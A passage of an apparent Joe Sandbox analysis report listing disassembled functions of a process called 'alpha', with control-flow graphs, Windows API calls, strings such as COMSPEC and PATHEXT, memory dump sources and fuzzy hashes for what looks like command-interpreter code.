                                                                                                                                                                                                                            • Part of subcall function 001A1F1A: GetConsoleOutputCP.KERNELBASE(001A0A41), ref: 001A1F1A
                                                                                                                                                                                                                            • Part of subcall function 001A1F1A: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001CC9F0), ref: 001A1F2B
                                                                                                                                                                                                                            • Part of subcall function 001A1F1A: memset.MSVCRT ref: 001A1F45
                                                                                                                                                                                                                            • Part of subcall function 001987CA: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(001CCA04), ref: 001987EE
                                                                                                                                                                                                                            • Part of subcall function 001987CA: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 001987FA
                                                                                                                                                                                                                            • Part of subcall function 001987CA: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 0019880E
                                                                                                                                                                                                                            • Part of subcall function 001987CA: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(001B7460,00000001), ref: 0019881B
                                                                                                                                                                                                                            • Part of subcall function 001987CA: _get_osfhandle.MSVCRT ref: 00198828
                                                                                                                                                                                                                            • Part of subcall function 001987CA: GetConsoleMode.KERNELBASE(00000000), ref: 00198830
                                                                                                                                                                                                                            • Part of subcall function 001987CA: _get_osfhandle.MSVCRT ref: 0019883C
                                                                                                                                                                                                                            • Part of subcall function 001987CA: GetConsoleMode.KERNELBASE(00000000), ref: 00198844
                                                                                                                                                                                                                            • Part of subcall function 001987CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 0019886A
                                                                                                                                                                                                                            • Part of subcall function 001987CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 001988A5
                                                                                                                                                                                                                          • _setjmp3.MSVCRT ref: 001AEA5E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console$CriticalQuerySectionThread$CommandInfoLineModeOpenOutputVirtual_get_osfhandle_setjmp3$CloseCtrlCurrentEnterHandlerHeapInformationInitializeLanguageLeaveValueexitmemset
                                                                                                                                                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System$p~du
                                                                                                                                                                                                                          • API String ID: 4238206819-4036716130
                                                                                                                                                                                                                          • Opcode ID: b91f48a2c5ba4f263f6519f9c2466ebff0e4558c15f93a8fe9c2f631fc1b7602
                                                                                                                                                                                                                          • Instruction ID: 449445fb3098e925f3e935f87777d7afb7b09e7249941bf5c4b894c09fbf66fd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b91f48a2c5ba4f263f6519f9c2466ebff0e4558c15f93a8fe9c2f631fc1b7602
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9719479541305AFEB15EB70DC46EBF3BE9FF1A344B14052AF502E2591EB34C8808A61
                                                                                                                                                                                                                          Function 001A00E9 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 169COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 371 1a00e9-1a0140 memset call 19e3f0 374 1a0146-1a014b 371->374 375 1ae615-1ae61d call 1a1e70 371->375 377 1a0151-1a016a GetModuleFileNameW call 19ec2e 374->377 378 1ae627 374->378 381 1ae61f-1ae621 exit 375->381 382 1ae632-1ae63e call 19a976 377->382 385 1a0170-1a017e call 19ec2e 377->385 378->382 381->378 389 1ae643-1ae64f call 19a976 382->389 385->389 390 1a0184-1a0192 call 19ec2e 385->390 396 1ae654-1ae660 call 19a976 389->396 395 1a0198-1a01a4 call 19ec2e 390->395 390->396 401 1a01aa-1a01b6 call 19ec2e 395->401 402 1ae665-1ae66a 395->402 396->402 409 1a01bc-1a01c4 401->409 410 1ae714-1ae724 _wcsicmp 401->410 403 1ae66c 402->403 404 1ae672-1ae67c call 19a62f 402->404 403->404 412 1ae6f8-1ae6fd 404->412 413 1ae67e-1ae691 _wcsupr 404->413 414 1a01ee-1a01f3 409->414 415 1a01c6-1a01d8 call 198bc7 409->415 410->409 411 1ae72a-1ae734 410->411 411->409 418 1ae6ff 412->418 419 1ae705-1ae70f call 19a976 412->419 416 1ae699 413->416 417 1ae693 413->417 414->415 425 1a01da-1a01e1 ??_V@YAXPAX@Z 415->425 426 1a01e2-1a01ed call 1a6b30 415->426 421 1ae69c-1ae6a5 416->421 417->416 418->419 419->410 421->421 424 1ae6a7-1ae6b0 421->424 429 1ae6ba-1ae6ce call 1a01f5 424->429 430 1ae6b2-1ae6b8 424->430 425->426 434 1ae6d0-1ae6d2 429->434 435 1ae6e1-1ae6e3 429->435 430->429 436 1ae6da-1ae6df 434->436 437 1ae6d4 434->437 438 1ae6eb 435->438 439 1ae6e5 435->439 440 1ae6f0-1ae6f3 call 19fc40 436->440 437->436 438->440 439->438 440->412
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A011A
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 001A0156
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001BE590,00002000,?,001D8BF0,00000000,?,?,00198F0D), ref: 0019EC51
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019EC77
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019EC8D
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019ECA3
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019ECB9
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019ECCF
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019ECE5
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019ECF7
                                                                                                                                                                                                                            • Part of subcall function 0019EC2E: _wcsicmp.MSVCRT ref: 0019ED0D
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 001A01DB
                                                                                                                                                                                                                          • exit.MSVCRT ref: 001AE621
                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 001AE683
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001AE71A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                                                                                                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                                                                          • API String ID: 2336066422-4197029667
                                                                                                                                                                                                                          • Opcode ID: a513a040e7af555d2024386eae6c41245f459fa96e3fb77615215998d9c53ad6
                                                                                                                                                                                                                          • Instruction ID: cc0a0b414fa8415d759dbc61141ce78e6078cb5673f15207862e1d95d4518c55
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a513a040e7af555d2024386eae6c41245f459fa96e3fb77615215998d9c53ad6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60512839B002169BDF18DB60CD95AFE77A5EF66304F444869E80AE7280EF70DE41CB91
                                                                                                                                                                                                                          Function 00198BC7 Relevance: 24.3, APIs: 16, Instructions: 312COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 442 198bc7-198be4 call 1a7d90 445 198bea-198c16 call 1a5a2e call 19e3f0 442->445 446 1ab5d4-1ab5d8 442->446 453 198c1c-198c2d call 19acb0 445->453 454 1ab774-1ab77a call 1a61e6 445->454 446->445 447 1ab5de-1ab5e3 446->447 450 198e67-198e76 447->450 453->454 460 198c33-198c3a 453->460 457 1ab77f 454->457 459 1ab781 457->459 461 198c3d-198c46 460->461 461->461 462 198c48-198c4c 461->462 463 198c4f-198c59 462->463 464 198c5b-198c60 463->464 465 198c66-198c70 463->465 464->465 466 1ab5e8-1ab5eb 464->466 467 1ab5f0 465->467 468 198c76-198c85 GetCurrentDirectoryW 465->468 466->463 469 1ab5fb 467->469 468->469 470 198c8b-198cb0 towupper iswalpha 468->470 471 1ab606 469->471 470->471 472 198cb6-198cba 470->472 474 1ab60f 471->474 472->471 473 198cc0-198cde towupper 472->473 473->474 475 198ce4-198cf8 GetFullPathNameW 473->475 476 1ab61a-1ab622 GetLastError 474->476 475->476 477 198cfe-198d01 475->477 480 1ab627-1ab647 call 1a61e6 _local_unwind4 476->480 478 1ab64c-1ab66a call 1a61e6 _local_unwind4 477->478 479 198d07-198d0e 477->479 483 1ab674 478->483 482 198d14-198d19 479->482 479->483 486 198d1f-198d23 482->486 487 1ab747-1ab767 call 1a61e6 _local_unwind4 482->487 490 1ab67f 483->490 489 198d29-198d2d 486->489 486->490 487->459 489->487 493 198d33-198d37 489->493 494 1ab68a 490->494 493->494 495 198d3d 493->495 498 1ab695 494->498 496 198d40-198d4a 495->496 496->496 497 198d4c-198d52 496->497 497->498 499 198d58 497->499 501 1ab6a0 498->501 500 198d5b-198d73 call 1a7d82 499->500 505 198d82-198d8c 500->505 506 198d75-198d7c 500->506 504 1ab6ab-1ab6b6 GetLastError 501->504 507 1ab6bc-1ab6bf 504->507 508 198da2-198da9 504->508 505->501 509 198d92-198d9c GetFileAttributesW 505->509 506->505 513 198e77-198e7a 506->513 507->508 510 1ab6c5-1ab6c8 507->510 511 198dc9-198dd2 508->511 512 198dab-198db0 508->512 509->504 509->508 510->480 514 1ab6ce 510->514 517 198dfa-198dfc 511->517 518 198dd4-198dd9 511->518 515 1ab6d3 512->515 516 198db6-198dbc call 1a0207 512->516 513->500 514->508 520 1ab6de 515->520 524 198dc1-198dc3 516->524 522 198e09-198e0e 517->522 523 198dfe-198e01 517->523 518->520 521 198ddf-198de9 GetFileAttributesW 518->521 525 1ab6e9-1ab6f4 GetLastError 520->525 521->525 526 198def-198df4 521->526 529 198e10-198e19 SetCurrentDirectoryW 522->529 530 198e87-198e8d 522->530 527 198e1f-198e24 523->527 528 198e03-198e07 523->528 524->478 524->511 525->480 533 1ab6fa 525->533 526->517 534 1ab6ff-1ab722 call 1a61e6 _local_unwind4 526->534 531 198e8f-198e95 527->531 532 198e26-198e30 call 19a976 527->532 528->522 528->527 529->476 529->527 530->529 531->532 540 1ab727-1ab745 call 1a61e6 _local_unwind4 532->540 541 198e36-198e3e 532->541 533->480 534->450 540->457 542 198e40-198e65 call 198e9e call 198e7f call 1a61e6 541->542 543 198e97-198e9c 541->543 542->450 543->542
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 001A5A2E: memset.MSVCRT ref: 001A5A5A
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000,?,00000104,?), ref: 00198C7A
                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00198C8F
                                                                                                                                                                                                                          • iswalpha.MSVCRT ref: 00198CA4
                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00198CC4
                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00198CF0
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 00198D93
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 00198DE0
                                                                                                                                                                                                                          • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00198E11
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001AB6AB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesCurrentDirectoryFilememsettowupper$ErrorFullLastNamePathiswalpha
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1133067188-0
                                                                                                                                                                                                                          • Opcode ID: 924aaf27c35e8ea2b3fbc609c9aa85f4577fe865661c66516a3fb8f7ab12f02c
                                                                                                                                                                                                                          • Instruction ID: 8d309dc2ca68e20796151a6f6fd0160ad6edf42a1f5749782617e4eb23867b87
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 924aaf27c35e8ea2b3fbc609c9aa85f4577fe865661c66516a3fb8f7ab12f02c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35B1E035A082558ADF28EFA4CD95BFDB3B4EF16310F59416AE41AE31D1EB309E80CB51
                                                                                                                                                                                                                          Function 0019E310 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 552 19e310-19e341 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 553 19e343-19e355 552->553 554 19e357-19e370 _get_osfhandle GetConsoleMode 552->554 553->554 555 19e3bc-19e3d9 _get_osfhandle SetConsoleMode 553->555 556 19e3bb 554->556 557 19e372-19e37f 554->557 555->554 560 19e3df-1adc17 555->560 558 19e381-19e39a _get_osfhandle SetConsoleMode 557->558 559 19e3a0-19e3a9 557->559 558->559 561 19e3ab-19e3b8 559->561 562 19e3ba 559->562 560->554 564 1adc1d-1adc45 _get_osfhandle SetConsoleMode 560->564 561->562 562->556 564->554
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019E318
                                                                                                                                                                                                                          • SetConsoleMode.KERNELBASE(00000000), ref: 0019E322
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019E32F
                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(00000000), ref: 0019E339
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019E35E
                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(00000000), ref: 0019E368
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019E390
                                                                                                                                                                                                                          • SetConsoleMode.KERNELBASE(00000000), ref: 0019E39A
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019E3C7
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0019E3D1
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001ADC35
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001ADC3F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                          • String ID: CMD.EXE
                                                                                                                                                                                                                          • API String ID: 1606018815-3025314500
                                                                                                                                                                                                                          • Opcode ID: 849958ada580edd0a344c8a097a79c245a6477df6d9cefd0f9127258900a3147
                                                                                                                                                                                                                          • Instruction ID: 50138d9931a005537641ea4e1e0d5545c619a4358ffbf2c4d838bfcae90f5f2d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 849958ada580edd0a344c8a097a79c245a6477df6d9cefd0f9127258900a3147
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 962171B0A02300AFDB14DB34EC1FBA63BA4BF00715B484529F507D7AA1DBB5E9948F56
                                                                                                                                                                                                                          Function 001959C0 Relevance: 15.3, APIs: 10, Instructions: 270COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 566 1959c0-1959e2 567 1959f4-195a36 memset call 19e3f0 566->567 568 1959e4-1959ee call 1a0b12 566->568 573 1a9a3a-1a9a3d 567->573 574 195a3c-195a41 567->574 568->567 575 1a9a27-1a9a35 call 1978e4 568->575 579 1a9a50 573->579 576 1a9a3f 574->576 577 195a47-195a5b GetFullPathNameW 574->577 586 195a90-195a9e call 1a6b30 575->586 580 1a9a4a GetLastError 576->580 577->580 581 195a61-195a66 577->581 583 1a9a52-1a9a53 579->583 580->579 584 195a6c-195a78 CreateDirectoryW 581->584 585 1a9a60-1a9a6f call 1978e4 581->585 587 1a9a54-1a9a5a call 1978e4 583->587 589 195a7a-195a84 584->589 590 195aa1-195aac GetLastError 584->590 598 1a9a76-1a9a82 call 1978e4 585->598 587->585 594 195a8e 589->594 595 195a86-195a8d ??_V@YAXPAX@Z 589->595 597 195ab2-195ab5 590->597 590->598 594->586 595->594 597->583 601 195abb-195ac2 597->601 605 1a9a8a 598->605 603 195ac8-195acf 601->603 604 195b8b-195b8e 601->604 603->605 606 195ad5-195adf 603->606 604->587 610 1a9a95 605->610 607 1a9aa0-1a9aa4 606->607 608 195ae5-195ae9 606->608 611 1a9aac-1a9aaf 607->611 612 1a9aa6 607->612 609 195aef-195af2 608->609 608->610 613 195b35 609->613 610->607 611->604 614 1a9ab5-1a9ab9 611->614 612->611 617 195b3b-195b41 613->617 615 1a9abb 614->615 616 1a9ac1-1a9ac5 614->616 615->616 616->604 618 1a9acb-1a9acf 616->618 619 195b68-195b6a 617->619 620 195b43-195b49 617->620 621 1a9ad1 618->621 622 1a9ad7-1a9ae8 618->622 625 195b6c-195b78 CreateDirectoryW 619->625 626 195b83-195b89 619->626 623 195b4b-195b5c 620->623 624 195af4-195af6 620->624 621->622 629 1a9aea-1a9af0 622->629 630 1a9b17-1a9b1a 622->630 623->620 631 195b5e-195b64 623->631 628 195af7-195b01 624->628 625->589 627 195b7e 625->627 626->625 632 1a9b7c-1a9b87 GetLastError 627->632 633 1a9b71 628->633 634 195b07-195b11 CreateDirectoryW 628->634 635 1a9af1-1a9af6 629->635 636 1a9b1c-1a9b25 630->636 637 1a9b27-1a9b2d 630->637 631->617 638 195b66 631->638 632->589 639 1a9b8d 632->639 633->632 640 195b20-195b32 634->640 641 195b13-195b1e GetLastError 634->641 642 1a9af8-1a9b0d 635->642 643 1a9b0f-1a9b15 635->643 636->637 637->619 644 1a9b33-1a9b37 637->644 638->628 639->583 640->613 641->604 641->640 642->635 642->643 643->630 645 1a9b38-1a9b3d 644->645 646 1a9b3f-1a9b54 645->646 647 1a9b56-1a9b61 645->647 646->645 646->647 647->619 648 1a9b67-1a9b6a 647->648 648->633
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00195A10
                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00195A53
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00195A70
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00195A87
                                                                                                                                                                                                                            • Part of subcall function 001A0B12: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001A0B40
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00195AA1
                                                                                                                                                                                                                          • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00195B09
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00195B13
                                                                                                                                                                                                                          • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00195B70
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001A9B7C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 402963468-0
                                                                                                                                                                                                                          • Opcode ID: 247cefdb9619c4dbb3340c4296f9a072f5a1405b1ff2714d3113528ba2a39097
                                                                                                                                                                                                                          • Instruction ID: b0d5137b88a7188f6bbed34b039b5d39165f13d147d5b32c6a5f1435a01a8668
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 247cefdb9619c4dbb3340c4296f9a072f5a1405b1ff2714d3113528ba2a39097
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5691F535A016169BEF29DB65DC85BBBB7B6FF89310F5440AAE50AE7180E7708DC0C760
                                                                                                                                                                                                                          Function 001A6903 Relevance: 10.6, APIs: 7, Instructions: 105sleepCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 649 1a6903-1a691d call 1a71a8 652 1a691f-1a692e 649->652 653 1a6948-1a694a 652->653 654 1a6930-1a6932 652->654 657 1a694b-1a6951 653->657 655 1a693b-1a6946 Sleep 654->655 656 1a6934-1a6939 654->656 655->652 656->657 658 1a695d-1a6963 657->658 659 1a6953-1a695b _amsg_exit 657->659 661 1a6991 658->661 662 1a6965-1a6975 call 1a6a7c 658->662 660 1a6997-1a699d 659->660 664 1a69ba-1a69bc 660->664 665 1a699f-1a69b0 _initterm 660->665 661->660 666 1a697a-1a697e 662->666 667 1a69be-1a69c5 664->667 668 1a69c7-1a69ce 664->668 665->664 666->660 669 1a6980-1a698c 666->669 667->668 670 1a69f3-1a6a05 call 1a09b1 668->670 671 1a69d0-1a69dd call 1a7000 668->671 673 1a6a6c-1a6a7b 669->673 675 1a6a0a-1a6a19 670->675 671->670 679 1a69df-1a69f1 671->679 677 1a6a1b-1a6a35 exit _XcptFilter 675->677 678 1a6a51-1a6a58 675->678 680 1a6a5a-1a6a60 _cexit 678->680 681 1a6a65 678->681 679->670 680->681 681->673
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,001BCA98,0000000C), ref: 001A6940
                                                                                                                                                                                                                          • _amsg_exit.MSVCRT ref: 001A6955
                                                                                                                                                                                                                          • _initterm.MSVCRT ref: 001A69A9
                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 001A69D5
                                                                                                                                                                                                                          • exit.MSVCRT ref: 001A6A1C
                                                                                                                                                                                                                          • _XcptFilter.MSVCRT ref: 001A6A2E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 796493780-0
                                                                                                                                                                                                                          • Opcode ID: b2bae9717c556ff03662cd6feed94a04ff33fb77cab668435ab505f11a6c92e8
                                                                                                                                                                                                                          • Instruction ID: 1dc495a63f97f4fb484fd45601f9f54845d5cd14d1b8eb734e70530db1ca06cc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2bae9717c556ff03662cd6feed94a04ff33fb77cab668435ab505f11a6c92e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD31D67E645311DFEB269F68ED456AA37E0FB46738F240229F50697AE0DB7098C0CB41
                                                                                                                                                                                                                          Function 0019E2AF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34threadlibraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
